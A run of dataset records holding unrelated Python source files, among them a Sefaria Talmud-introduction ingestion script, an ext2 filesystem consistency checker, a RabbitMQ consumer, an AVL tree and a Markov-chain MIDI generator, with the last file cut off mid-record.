index.nodes\n nodes_list = []\n current_masechet = \"no masechet yet\"\n for segment_dict in list_of_masechtot:\n if (segment_dict['masechet'] == starting_masechet_name) or found_starting_masechet_flag:\n found_starting_masechet_flag = True\n if segment_dict['masechet'] != current_masechet:\n masechet_node = SchemaNode()\n masechet_node.key = segment_dict[\"masechet\"] # should be equal to primary title\n masechet_node.add_primary_titles(segment_dict[\"masechet\"], segment_dict[\"masechet_hebrew\"])\n\n leaf_node = JaggedArrayNode()\n leaf_node.add_primary_titles(segment_dict[\"title\"], segment_dict[\"title_hebrew\"])\n leaf_node.add_structure([\"Paragraph\"])\n masechet_node.append(leaf_node)\n if segment_dict['masechet'] != current_masechet:\n nodes_list.append(masechet_node)\n current_masechet = segment_dict['masechet']\n # insert_last_child(masechet_node, parent)\n return nodes_list\n\n\ndef list_of_masechtot_to_db(nodes_list):\n ####dangerous way to add new nodes:\n # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n # parent = index.nodes\n # for node in nodes_list:\n # insert_last_child(node, parent)\n for node in nodes_list:\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n parent = index.nodes\n insert_last_child(node, parent)\n print(\"finished updating index db\")\n\n\ndef object_to_dict_of_refs(csv_parsed_object, language):\n refs_dict = {}\n text_language = \"\"\n if language == \"english\":\n text_language = \"english_text\"\n if language == \"hebrew\":\n text_language = \"hebrew_text\"\n\n for chapter in csv_parsed_object:\n paragraph_num = 1\n for paragraph in chapter[text_language]:\n ref = chapter[\"ref\"] + \" \" + str(paragraph_num)\n refs_dict[ref] = paragraph\n ##refs_dict[ref] = \":)\"\n paragraph_num += 1\n return refs_dict\n\n\ndef ingest_english_version():\n vs = VersionState(index=library.get_index(\"Introductions to the Babylonian Talmud\"))\n vs.delete()\n print(\"deleted version state\")\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n\n chapter = index.nodes.create_skeleton()\n english_version = Version({\"versionTitle\": \"William Davidson Edition - English\",\n \"versionSource\": \"'https://korenpub.com/collections/the-noe-edition-koren-talmud-bavli-1'\",\n \"title\": \"Introductions to the Babylonian Talmud\",\n \"chapter\": chapter,\n \"language\": \"en\",\n \"digitizedBySefaria\": True,\n \"license\": \"CC-BY-NC\",\n \"status\": \"locked\"\n })\n\n version_text_map_english = object_to_dict_of_refs(csv_object, \"english\")\n modify_bulk_text(superuser_id, english_version, version_text_map_english)\n\n print(\"finished updating English version db\")\n\n\ndef ingest_hebrew_version():\n vs = VersionState(index=library.get_index(\"Introductions to the Babylonian Talmud\"))\n vs.delete()\n print(\"deleted version state\")\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n chapter = index.nodes.create_skeleton()\n hebrew_version = Version({\"versionTitle\": \"William Davidson Edition - Hebrew\",\n \"versionSource\": \"'https://korenpub.com/collections/the-noe-edition-koren-talmud-bavli-1'\",\n \"title\": \"Introductions to the Babylonian Talmud\",\n \"chapter\": chapter,\n \"language\": \"he\",\n \"digitizedBySefaria\": True,\n \"license\": \"CC-BY-NC\",\n \"status\": \"locked\"\n })\n version_text_map_hebrew = object_to_dict_of_refs(csv_object, \"hebrew\")\n modify_bulk_text(superuser_id, hebrew_version, version_text_map_hebrew)\n print(\"finished updating Hebrew 
version db\")\n\n\ndef delete_all_existing_versions():\n cur_version = VersionSet({'title': 'Introductions to the Babylonian Talmud',\n 'versionTitle': \"William Davidson Edition - Hebrew\"})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleted existing hebrew version\")\n\n cur_version = VersionSet({'title': 'Introductions to the Babylonian Talmud',\n 'versionTitle': \"William Davidson Edition - English\"})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleted existing english version\")\n\n\ndef reorder_masechet_nodes():\n masechtot_keys_ordered = [\"Berakhot\", \"Shabbat\", \"Eruvin\", \"Pesachim\", \"Rosh Hashanah\", \"Yoma\", \"Sukkah\", \"Beitzah\",\n \"Taanit\", \"Megillah\", \"Moed Katan\", \"Chagigah\",\n \"Yevamot\", \"Ketubot\", \"Nedarim\", \"Nazir\", \"Sotah\", \"Gittin\", \"Kiddushin\",\n \"Bava Kamma\", \"Bava Metzia\", \"Bava Batra\", \"Sanhedrin\", \"Makkot\", \"Shevuot\",\n \"Avodah Zarah\", \"Horayot\",\n \"Zevachim\", \"Menachot\", \"Chullin\", \"Bekhorot\", \"Arakhin\", \"Temurah\", \"Keritot\", \"Meilah\",\n \"Tamid\", \"Niddah\"]\n index = library.get_index(\"Introductions to the Babylonian Talmud\")\n reorder_children(index.nodes, masechtot_keys_ordered)\n print(\"finished re-ordering\")\n\n\ndef roman_to_int(s):\n rom_val = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n int_val = 0\n for i in range(len(s)):\n if i > 0 and rom_val[s[i]] > rom_val[s[i - 1]]:\n int_val += rom_val[s[i]] - 2 * rom_val[s[i - 1]]\n else:\n int_val += rom_val[s[i]]\n return int_val\n\n\ndef create_links(csv_object):\n links = []\n for ref_dict in csv_object:\n raw_ref = ref_dict['ref']\n if \"Perek\" in raw_ref:\n # exact_ref = library.get_index('Berakhot').get_alt_structs['Perek'][0]['wholeRef']\n chapter_num = roman_to_int(raw_ref.split(\"Perek\", 1)[1].strip())\n exact_ref = Ref(ref_dict[\"masechet\"] + \", Chapter \" + str(chapter_num)).normal()\n # text_display_en = ref_dict[\"masechet\"] + \", Chapter \" + str(chapter_num)\n # text_display_he = ref_dict[\"masechet_hebrew\"] + \", פרק \" + str(chapter_num)\n\n\n else:\n exact_ref = str(Ref(ref_dict[\"masechet\"]).as_ranged_segment_ref())\n # text_display_en = ref_dict[\"masechet\"]\n # text_display_he = ref_dict[\"masechet_hebrew\"]\n\n new_link_dict = {\n \"refs\": [ref_dict['ref'], exact_ref], #[ref_dict['ref'], exact_ref], [ref_dict['ref'], \"Berakhot 2a:1\"]\n \"type\": \"essay\",\n \"versions\": [\n {\n \"title\": \"NONE\", \"language\": \"en\" # \"title\": \"ALL\", \"language\": \"en\" \"title\": \"NONE\", \"language\": \"en\"\n },\n {\n \"title\": \"ALL\", \"language\": \"ALL\"\n }\n ],\n \"displayedText\": [\n {\n \"en\": ref_dict[\"title\"], # raw_ref.split(\"Talmud,\", 1)[1].strip(),\n \"he\": ref_dict[\"title_hebrew\"] # raw_ref.split(\"Talmud,\", 1)[1].strip()\n },\n {\n \"en\": \"\",\n \"he\": \"\"\n }\n ]\n\n }\n new_link = Link(new_link_dict)\n\n links.append(new_link)\n\n return (links)\n\n # refs: list with two trefs\n # type: \"essay\"\n # versions: list with version titles\n # displayedText: list with displayed text\n #\n\n\ndef delete_existing_links(query={\"generated_by\": \"Koren Intro Parse Script\"}):\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n l.delete()\n\ndef delete_existing_koren_links(query={\"generated_by\": \"Koren Intro Parse Script\"}):\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n l.delete()\n\ndef delete_existing_automated_links(query={\"type\": \"\", \"refs\": {\"$regex\" : \"Introductions to the 
Babylonian Talmud\"}}):\n    list_of_links = LinkSet(query).array()\n    for l in list_of_links:\n        if Ref(l.refs[0]).is_bavli():\n            l.delete()\n\ndef delete_existing_correct_essay_links(query={\"type\":\"essay\", \"refs\": {\"$regex\" : \"Introductions to the Babylonian Talmud\"}}):\n    list_of_links = LinkSet(query).array()\n    for l in list_of_links:\n        l.delete()\n\ndef insert_links_to_db(list_of_links):\n    for l in list_of_links:\n        l.save()\n\n\n\n    # m = library._index_map\n    # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n\n    # english_version = Version().load({\"title\": \"Introductions to the Babylonian Talmud\", \"versionTitle\": \"William Davidson Edition - English\"})\n\n    # hebrew_version = Version().load(\n    #     {\"title\": \"Introductions to the Babylonian Talmud\", \"versionTitle\": \"William Davidson Edition - Hebrew\"})\n    # with open(\"introductions_to_the_babylonian_talmud_index.json\") as f:\n    #     new_index = json.load(f)\n    #\n    # db.index.insert_one(new_index)\n    # index = library.get_index(\"Introductions to the Babylonian Talmud\")\n\n\nif __name__ == '__main__':\n    print(\"hello world\")\n\n\n\n    superuser_id = 171118\n\n\n\n    csv_object = parse_csv_to_object()\n\n\n    # index_nodes = get_list_of_masechtot_nodes(csv_object, \"Sanhedrin\")\n    # list_of_masechtot_to_db(index_nodes)\n    # time.sleep(5)\n    # delete_all_existing_versions()\n\n    ingest_english_version()\n    time.sleep(5)\n    ingest_hebrew_version()\n\n\n    reorder_masechet_nodes()\n\n\n\n    delete_existing_correct_essay_links()\n    delete_existing_koren_links()\n    delete_existing_automated_links()\n    list_of_links = create_links(csv_object)\n    insert_links_to_db(list_of_links)\n","sub_path":"sources/steinsaltz_intros_talmud/steinsaltz_intros_add_nodes.py","file_name":"steinsaltz_intros_add_nodes.py","file_ext":"py","file_size_in_byte":14622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"239737429","text":"\"\"\"\nManager class to handle csv file storage of scraped data\n\"\"\"\nimport csv\n\nCSV_FILENAME = \"oddsportal.csv\"\n\n\nclass CSVFileManager:\n    def __init__(self):\n        \"\"\"\n        initialize csv_file writer\n        \"\"\"\n\n        self.csv_file = open(CSV_FILENAME, mode='w')\n        self.csv_file_writer = csv.writer(self.csv_file, delimiter=',')\n\n\n    def add_soccer_match(self, league, retrieved_from_url, match):\n        \"\"\"\n        Append a soccer match entry to the CSV file.\n\n        Args:\n            league (dict): The dict result from parsing a league.json file.\n\n            retrieved_from_url (str): URL this match was retrieved from.\n\n            match (object): The SoccerMatch to write to the CSV file.\n        \"\"\"\n\n        # write row into csv file\n        self.csv_file_writer.writerow([\n            league[\"league\"],\n            league[\"area\"],\n            retrieved_from_url,\n            str(match.get_start_time_unix_int()),\n            str(match.get_end_time_unix_int()),\n            match.get_team1_string(),\n            match.get_team2_string(),\n            match.get_outcome_string(),\n            str(match.get_team1_odds()),\n            str(match.get_team2_odds()),\n            str(match.get_draw_odds()),\n            str(match.get_team1_score()),\n            str(match.get_team2_score())\n\n\n        ])\n\n    def __del__(self):\n        \"\"\"\n        Destructor.\n        \"\"\"\n\n        self.csv_file.close()\n\n\n\n","sub_path":"soccer_to_sql/CSVManager.py","file_name":"CSVManager.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382872992","text":"import pickle\r\nimport random\r\nfrom EasyMIDI import EasyMIDI, Track, Note\r\nimport sys\r\n\r\n
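
The record below reconstructs a melody by walking a Markov chain of (pitches..., duration) states, sampling each step with random.choices weighted by transition counts. A self-contained sketch of that single sampling step — the states and counts are invented:

import random

transition_count = {("C4",): {("E4",): 3, ("G4",): 1}}   # invented counts
state = ("C4",)
options = transition_count[state]
state = random.choices(list(options.keys()), weights=list(options.values()))[0]
# state is now ("E4",) roughly three times as often as ("G4",)

init_symbols = pickle.load( open( 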
sys.argv[1] + '/init_symbols.p', \"rb\" ) )\r\nsymbol_transition_count = pickle.load( open( sys.argv[1] + '/symbol_transition_count.p', \"rb\" ) )\r\n\r\ninitial_state = tuple(random.choice(init_symbols))\r\nsequence = [initial_state]\r\nfor i in range( int(sys.argv[3])):\r\n if sequence[-1] not in symbol_transition_count:\r\n break\r\n\r\n transitions = symbol_transition_count[sequence[-1]]\r\n weights = list(transitions.values())\r\n states = list(transitions.keys())\r\n current_state = random.choices(states, weights = weights)[0]\r\n sequence.append(current_state)\r\n\r\nn_tracks = len(sequence[0]) - 1\r\ntracks = [[] for i in range(n_tracks)]\r\nfor state in sequence:\r\n for i in range(n_tracks):\r\n pitch = state[i]\r\n duration = state[-1]\r\n if pitch > 0:\r\n tracks[i].append([pitch, duration])\r\n else:\r\n tracks[i][-1][1] += duration\r\n\r\nnotes = ['C', 'C#', 'D', 'Eb', 'E', 'F', 'F#', 'G', 'Ab', 'A', 'Bb', 'B']\r\n\r\neasyMIDI = EasyMIDI()\r\n\r\nfor voice in tracks:\r\n track = Track(\"choir aahs\")\r\n for note in voice:\r\n pitch = note[0]\r\n duration = note[1]\r\n midi_note = Note(notes[pitch%12], octave = pitch//12 - 1, duration = duration/4, volume = 100)\r\n track.addNote(midi_note)\r\n\r\n easyMIDI.addTrack(track)\r\n\r\neasyMIDI.writeMIDI(sys.argv[2])","sub_path":"sequence_generator.py","file_name":"sequence_generator.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454007104","text":"from django.urls import path\nfrom . import views\n\n# Add a namespace to differentiate names of views between different apps\n#app_name = 'sys'\n\nurlpatterns = [\n path('available', views.available, name='available'),\n path('reserve', views.reserve, name='reserve'),\n path('end_reservation', views.end_reservation, name='end_reservation'),\n]\n","sub_path":"scooters/system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"575240789","text":"#! 
/usr/bin/env python\n\nfrom __future__ import print_function\nimport csv\nimport sys\nimport os\n\ncsvfile = \"\"\nsuperblock = None\ngroup = None\nfreeBlocks = set()\nallocatedBlocks = set()\nduplicateBlocks = dict()\nfreeInodes = set()\ninodes = []\ndirEntries = []\nindirects = []\nexit_code = 0\n\n\nclass Superblock:\n def __init__(self, arg):\n self.blockCount = int(arg[1])\n self.inodeCount = int(arg[2])\n self.blockSize = int(arg[3])\n self.inodeSize = int(arg[4])\n self.blocksPG = int(arg[5])\n self.inodesPG = int(arg[6])\n self.firstNonReserved = int(arg[7])\n\nclass Group:\n def __init__(self, arg):\n self.numberBlocks = int(arg[2])\n self.numberInodes = int(arg[3])\n self.freeBlocks = int(arg[4])\n self.freeInodes = int(arg[5])\n self.bitmap = int(arg[6])\n self.inodemap = int(arg[7])\n self.firstInode = int(arg[8])\n\nclass DirectoryElement:\n def __init__(self, arg):\n self.parentInum = int (arg[1])\n self.fileInum = int (arg[3])\n self.lenOfElement = int (arg[4])\n self.lenOfName = int (arg [5])\n self.fileName = arg[6]\n\nclass Inode:\n def __init__(self, arg):\n self.inodeNumber = int(arg[1])\n self.fileType = arg[2]\n self.owner = int(arg[4])\n self.group = int(arg[5])\n self.linkCount = int(arg[6])\n self.fileSize = int(arg[10])\n self.numberBlocks = int(arg[11])\n self.blockAddresses = list()\n for x in range(12, 27):\n self.blockAddresses.append(int(arg[x]))\n allocatedBlocks.add(int(arg[x]))\n \nclass Indirect:\n def __init__(self, arg):\n self.inodeNumber = int(arg[1])\n self.levelIndirection = int(arg[2])\n self.offset = int(arg[3])\n self.blockNumberIndirect = int(arg[4])\n blockNumber = int(arg[5])\n self.blockNumberReferenced = blockNumber\n global allocatedBlocks\n global duplicateBlocks\n allocatedBlocks.add(blockNumber)\n if blockNumber not in duplicateBlocks:\n duplicateBlocks[blockNumber] = list()\n duplicateBlocks[blockNumber].append((self.inodeNumber, self.offset)) #not sure what offset to use\n\ndef checkBlockConsistency():\n global superblock\n global duplicateBlocks\n global allocatedBlocks\n global freeBlocks\n #examine every block pointer in every single inode, directory block, indirect block, double indirect block, triple indirect block\n for inode in inodes: #first check invalid and reserved blocks by examining block pointers in inode\n i = 1\n for pointer in inode.blockAddresses:\n if(pointer < 0 or pointer > superblock.blockCount): #check invalid\n if i <= 12:\n print (\"INVALID BLOCK %d IN INODE %d AT OFFSET 0\" %(pointer,inode.inodeNumber))\n elif i == 13:\n print (\"INVALID INDIRECT BLOCK %d IN INODE %d AT OFFSET 12\" %(pointer,inode.inodeNumber))\n elif i == 14:\n print (\"INVALID DOUBLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 268\" %(pointer,inode.inodeNumber))\n elif i == 15:\n print (\"INVALID TRIPLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 65804\" %(pointer,inode.inodeNumber))\n elif(pointer < 8 and pointer != 0): #check reserved #why???\n if i <= 12:\n print (\"RESERVED BLOCK %d IN INODE %d AT OFFSET 0\" %(pointer,inode.inodeNumber))\n elif i == 13:\n print (\"RESERVED INDIRECT BLOCK %d IN INODE %d AT OFFSET 12\" %(pointer,inode.inodeNumber))\n elif i == 14:\n print (\"RESERVED DOUBLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 268\" %(pointer,inode.inodeNumber))\n elif i == 15:\n print (\"RESERVED TRIPLE INDIRECT BLOCK %d IN INODE %d AT OFFSET 65804\" %(pointer,inode.inodeNumber))\n if pointer not in duplicateBlocks:\n duplicateBlocks[pointer] = list()\n if i <= 12:\n duplicateBlocks[pointer].append((inode.inodeNumber, 0))\n elif i == 13:\n 
duplicateBlocks[pointer].append((inode.inodeNumber, 12))\n elif i == 14:\n duplicateBlocks[pointer].append((inode.inodeNumber, 268))\n elif i == 15:\n duplicateBlocks[pointer].append((inode.inodeNumber, 65804))\n i += 1 \n for i in range(8, superblock.blockCount):\n if i not in freeBlocks and i not in allocatedBlocks:\n print (\"UNREFERENCED BLOCK %d\" %(i))\n for block in allocatedBlocks:\n if block in freeBlocks and block in range(8, superblock.blockCount):\n print(\"ALLOCATED BLOCK %d ON FREELIST\" %(block))\n for key, value in duplicateBlocks.items():\n if (len(value) > 1) and (key in range(8,superblock.blockCount)):\n for duplicate in value:\n if (int(duplicate[1])) >= 65804:\n print(\"DUPLICATE TRIPLE INDIRECT BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n elif (int(duplicate[1])) >= 268:\n print(\"DUPLICATE DOUBLE INDIRECT BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n elif (int(duplicate[1])) >= 12:\n print(\"DUPLICATE INDIRECT BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n else:\n print(\"DUPLICATE BLOCK %d IN INODE %d AT OFFSET %d\" %(key, duplicate[0], duplicate[1]))\n\n\ndef checknodeAlloc():\n global superblock\n global exit_code\n \n cnt_inode = superblock.inodeCount\n \n for i in range(0, cnt_inode):\n if i != 2:\n if i < 11:\n continue\n \n al_fl = False\n fr_fl = False\n \n for inode in inodes:\n if inode.inodeNumber == i:\n al_fl = True\n break\n\n if i in freeInodes:\n fr_fl = True\n \n if al_fl == fr_fl:\n if fr_fl:\n print(\"ALLOCATED INODE %d ON FREELIST\" % (i))\n exit_code = 1\n else:\n print(\"UNALLOCATED INODE %d NOT ON FREELIST\" % (i))\n exit_code = 1\n\n\ndef DirectoryConsistencyAuditing():\n global superblock\n global exit_code\n \n cnt_inode = superblock.inodeCount\n holder = {}\n \n for inode in inodes:\n cnt_links = 0\n \n for directory in dirEntries:\n \n if inode.inodeNumber == directory.fileInum:\n cnt_links = 1 + cnt_links\n\n elif inode.inodeNumber == directory.parentInum and (directory.fileInum > cnt_inode or directory.fileInum < 1):\n print(\"DIRECTORY INODE %d NAME %s INVALID INODE %d\" %(directory.parentInum, directory.fileName, directory.fileInum))\n exit_code = 1\n\n elif inode.inodeNumber == directory.parentInum and not any(i.inodeNumber == directory.fileInum for i in inodes):\n print(\"DIRECTORY INODE %d NAME %s UNALLOCATED INODE %d\" %(directory.parentInum, directory.fileName, directory.fileInum))\n exit_code = 1\n \n if directory.parentInum == 2:\n holder[directory.fileInum] = directory.parentInum\n \n \n if cnt_links != inode.linkCount:\n print(\"INODE %d HAS %d LINKS BUT LINKCOUNT IS %d\" % (inode.inodeNumber, cnt_links, inode.linkCount))\n exit_code = 1\n\n for directory in dirEntries:\n if directory.fileInum != directory.parentInum and directory.fileName == \"'.'\":\n print(\"DIRECTORY INODE %d NAME '.' LINK TO INODE %d SHOULD BE %d\" %(directory.parentInum, directory.fileInum, directory.parentInum))\n exit_code = 1\n elif directory.fileInum != holder[directory.parentInum] and directory.fileName == \"'..'\":\n print(\"DIRECTORY INODE %d NAME '..' 
LINK TO INODE %d SHOULD BE %d\" %(directory.parentInum, directory.fileInum, holder[directory.parentInum]))\n exit_code = 1\n \n\n\ndef main():\n if (len(sys.argv) != 2):\n sys.stderr.write(\"Usage: Require one argument - a csv file\")\n exit(1)\n global csvfile\n csvfile = sys.argv[1]\n with open(csvfile, 'rb') as opencsvfile:\n reader = csv.reader(opencsvfile)\n try:\n for row in reader: #basically storing all the information from the csv file\n if row[0] == \"SUPERBLOCK\":\n global superblock \n superblock = Superblock(row)\n elif row[0] == \"GROUP\":\n global group\n group = Group(row)\n elif row[0] == \"BFREE\":\n global freeBlocks\n freeBlocks.add(int(row[1]))\n elif row[0] == \"IFREE\":\n global freeInodes\n freeInodes.add(int(row[1]))\n elif row[0] == \"INODE\":\n global inodes\n inodes.append(Inode(row))\n elif row[0] == \"DIRENT\":\n global dirEntries\n dirEntries.append(DirectoryElement(row))\n elif row[0] == \"INDIRECT\":\n global indirects\n indirects.append(Indirect(row))\n except csv.Error as e:\n sys.exit('file %s, line %d: %s' % (csvfile, reader.line_num, e))\n checkBlockConsistency()\n checknodeAlloc()\n DirectoryConsistencyAuditing()\n\n\nif __name__==\"__main__\":\n main()\n if exit_code == 0:\n exit(0)\n else:\n exit(2)\n\n \n\n","sub_path":"lab3b/lab3b.py","file_name":"lab3b.py","file_ext":"py","file_size_in_byte":9656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107249178","text":"import json\n\nfrom krk_meetings.exchanges import Exchange\nfrom krk_meetings.rabbitmq.RmqHelper import RmqHelper\n\n\nclass RmqConsumer(RmqHelper):\n def __init__(self, exchange: Exchange, callback_function):\n super().__init__(exchange)\n self.function = callback_function\n\n if self.exchange.type:\n self.channel.exchange_declare(exchange=self.exchange.name, exchange_type=self.exchange.type)\n else:\n self.channel.exchange_declare(exchange=self.exchange.name)\n queue_name = f\"{self.exchange.queue}_{str(id(self))}\" if self.exchange.separate_instances else self.exchange.queue\n result = self.channel.queue_declare(queue=queue_name)\n self.queue = result.method.queue\n\n self.channel.queue_bind(exchange=self.exchange.name, routing_key=self.exchange.key, queue=self.queue)\n\n def start(self):\n self.channel.basic_consume(queue=self.queue, on_message_callback=self.callback, auto_ack=False)\n self.channel.start_consuming()\n\n def callback(self, ch, method, properties, body):\n if self.is_heartbeat(json.loads(body)):\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return\n self.function(self.exchange.from_json(body))\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n\n","sub_path":"backend/krk_meetings/rabbitmq/RmqConsumer.py","file_name":"RmqConsumer.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238828073","text":"import os\r\nimport jieba\r\nimport pickle\r\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\r\nimport matplotlib.pyplot as plt\r\n\r\ntext_path = os.getcwd() + \"/lrc.txt\"\r\nword_path = os.getcwd() + \"/lrc_word.txt\"\r\nimg_path = os.getcwd() + \"/lrc.jpg\"\r\n\r\n# text = ''\r\n#\r\n# with open(text_path, 'r', encoding='utf8') as fin:\r\n# for line in fin.readlines():\r\n# line = line.strip('\\n')\r\n# text += ' '.join(jieba.cut(line))\r\n# text += ' '\r\n# fout = open(os.getcwd() + \"/lrc_word.txt\", 'wb')\r\n# pickle.dump(text, fout)\r\n# fout.close()\r\n\r\nfr = open(word_path, 'rb')\r\ntext = 
pickle.load(fr)\r\n\r\nwc = WordCloud(background_color='white', # set the background color\r\n               max_words=2000, # set the maximum number of words to display\r\n               stopwords=['作词', '作曲'],\r\n               font_path='C:\Windows\Fonts\msyh.ttc', # set the font; Chinese cannot be displayed without it\r\n               max_font_size=50, # set the maximum font size\r\n               random_state=30, # set how many random states there are, i.e. how many color schemes\r\n               )\r\nwc.generate(text)\r\n\r\nwc.to_file(img_path)\r\n","sub_path":"practices/music163_spider/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"349729527","text":"# AVL tree\nfrom utils import *\n\n\nclass AVLNode(object):\n    def __init__(self, key, data, occ):\n        self.key = key\n        self.data = data\n        self.occ = occ\n        self.left = None\n        self.right = None\n        self.height = int(1)\n\n\nclass AVLTree(object):\n\n    def createnode(self, key, data, occ):\n        return AVLNode(key, data, occ)\n\n    def getheight(self, root):\n        if not root:\n            return 0\n        return root.height\n\n    def rightRotate(self, k2):\n        k1 = k2.left\n        k2.left = k1.right\n        k1.right = k2\n        k2.height = 1 + max(self.getheight(k2.left), self.getheight(k2.right))\n        k1.height = 1 + max(self.getheight(k1.left), self.getheight(k1.right))\n        return k1\n\n    def leftRotate(self, k2):\n        k1 = k2.right\n        k2.right = k1.left\n        k1.left = k2\n        k2.height = 1 + max(self.getheight(k2.left), self.getheight(k2.right))\n        k1.height = 1 + max(self.getheight(k1.left), self.getheight(k1.right))\n        return k1\n\n    def doubleRight(self, k3):\n        k3.left = self.leftRotate(k3.left)\n        return self.rightRotate(k3)\n\n    def doubleLeft(self, k3):\n        k3.right = self.rightRotate(k3.right)\n        return self.leftRotate(k3)\n\n    def search(self, tree, dat):\n        found = False\n\n        key = ordstring(dat)\n        if tree is None and not found:\n            print(\"key not found, adding it to the tree...\\n\")\n            return False\n\n        if tree.key == key and tree.data == dat:\n            found = True\n            print(\"key is in the tree\\n\")\n            tree.occ += 1\n            return True\n        elif key < tree.key:\n            return self.search(tree.left, dat)\n        elif key > tree.key:\n            return self.search(tree.right, dat)\n\n    def insert(self, root, data, occ):\n        key = ordstring(data)\n        # step 1: plain binary search tree insertion\n        if not root:\n            return AVLNode(key, data, occ)\n        elif key < root.key:\n            root.left = self.insert(root.left, data, occ)\n        else:\n            root.right = self.insert(root.right, data, occ)\n        # step 2: update the height of the ancestor node\n        root.height = 1 + max(self.getheight(root.left), self.getheight(root.right))\n        # step 3: compute the balance factor\n        balance = self.getbalance(root)\n        # step 4: if the node is unbalanced\n        # case 1: left left\n        if balance > 1 and key < root.left.key:\n            return self.rightRotate(root)\n        # case 2: right right\n        if balance < -1 and key > root.right.key:\n            return self.leftRotate(root)\n        # case 3: left right\n        if balance > 1 and key > root.left.key:\n            return self.doubleRight(root)\n        # case 4: right left\n        if balance < -1 and key < root.right.key:\n            return self.doubleLeft(root)\n\n        return root\n\n    def delete(self, root, data):\n        key = ordstring(data)\n        # step 1: plain binary search tree removal\n        if not root:\n            return root\n        elif key < root.key:\n            root.left = self.delete(root.left, data)\n        elif key > root.key:\n            root.right = self.delete(root.right, data)\n        else:\n            if key == root.key and root.data == data:\n                if root.left is None:\n                    aux = root.right\n                    root = None\n                    return aux\n                elif root.right is None:\n                    aux = root.left\n                    root = None\n                    return aux\n\n                aux = self.getminkeynode(root.right)\n                root.data = 
aux.data\n                root.right = self.delete(root.right, aux.data)\n\n        # if the tree only has the root\n\n        if root is None:\n            return root\n\n        # step 2: update the height of the ancestor node\n\n        root.height = 1 + max(self.getheight(root.left), self.getheight(root.right))\n\n        # step 3: get the balance factor\n\n        balance = self.getbalance(root)\n\n        # step 4: if the node is unbalanced\n        # test the 4 cases\n\n        # case 1 - left-heavy > single right rotation\n        if int(balance) > 1 and self.getbalance(root.left) >= 0:\n            return self.rightRotate(root)\n        # case 2 - right-heavy > single left rotation\n        if int(balance) < -1 and self.getbalance(root.right) <= 0:\n            return self.leftRotate(root)\n        # case 3 - double right rotation\n        if int(balance) > 1 and self.getbalance(root.left) < 0:\n            return self.doubleRight(root)\n        # case 4 - double left rotation\n        if int(balance) < -1 and self.getbalance(root.right) > 0:\n            return self.doubleLeft(root)\n\n        return root\n\n    def getminkeynode(self, root):\n        if root is None or root.left is None:\n            return root\n\n        return self.getminkeynode(root.left)\n\n    def balance(self, root):\n        if not root:\n            return 0\n        return int(self.getheight(root.left) - self.getheight(root.right))\n\n    def getbalance(self, root):\n        if not root:\n            return 0\n        return int(self.getheight(root.left) - self.getheight(root.right))\n\n    def preorder(self, root):\n        if not root:\n            return\n        print(\"{0} \".format(root.key), \"{0} \".format(root.data), end=\"\")\n        self.preorder(root.left)\n        self.preorder(root.right)\n\n    def inorder(self, root):\n        if not root:\n            return\n        self.inorder(root.left)\n        print(\"{0} \".format(root.key), \"{0} \".format(root.data), end=\"\")\n        self.inorder(root.right)\n\n    def posorder(self, root):\n        if not root:\n            return\n        self.posorder(root.left)\n        self.posorder(root.right)\n        print(\"{0} \".format(root.key), \"{0} \".format(root.data), end=\"\")\n\n    def generatelist(self, root, l):\n        x = root\n        if x is None:\n            return\n\n        l.append(x)\n        self.generatelist(x.left, l)\n        self.generatelist(x.right, l)\n\n    def sortedlist(self, root):\n        l = []\n        self.generatelist(root, l)\n        ordenar(l, False)\n        for i in l:\n            print(\"|\", i.data, \"occurrence: \", i.occ, \"|\\n\")\n","sub_path":"src/avl.py","file_name":"avl.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"222363567","text":"import xgboost as xgb\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n\nclass XGBoost_kit:\n    def __init__(self):\n        pass\n\n    def get_baseline_model(type, x_train, y_train):\n        x_train = np.array(x_train, ndmin=2)\n        y_train = np.array(y_train, ndmin=2)\n        if (x_train.shape[0] != y_train.shape[0]):\n            y_train = y_train.T\n        if (x_train.shape[0] != y_train.shape[0]):\n            print(\"x_train and y_train do not match in length: \", x_train.shape, \" vs \", y_train.shape)\n        x_length = y_train.shape[1]\n\n        x_train, x_test, y_train, y_test = train_test_split(x_train, y_train, test_size=0.2, random_state=123)\n        print(x_train.shape, \" \", y_train.shape)\n\n        if (type == 'regressor'):\n            print(\"Regressor 